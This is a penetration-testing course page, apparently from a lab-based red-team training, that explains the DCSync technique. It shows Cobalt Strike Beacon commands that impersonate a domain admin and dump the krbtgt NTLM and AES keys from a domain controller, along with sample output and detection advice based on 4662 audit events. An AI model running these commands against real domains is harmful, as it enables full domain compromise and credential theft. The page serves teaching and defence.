search

DCSync

The Directory Replication Service (MS-DRSR) protocolarrow-up-right is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

This requires GetNCChangesarrow-up-right which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

\

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

beacon> make_token DEV\nlamb F3rrari

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
		
* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

\

Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).

\

OPSEC Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Find these using the "Suspicious Directory Replication" saved search in Kibana.

\

\

Replication traffic usually only occurs between domain controllers but can also be seen via applications such as Azure AD Connectarrow-up-right. Mature organisations should baseline typical DRS traffic to find suspicious outliers.

PreviousExtracting Kerberos TicketsNextPassword Cracking Tips & Tricks

Last updated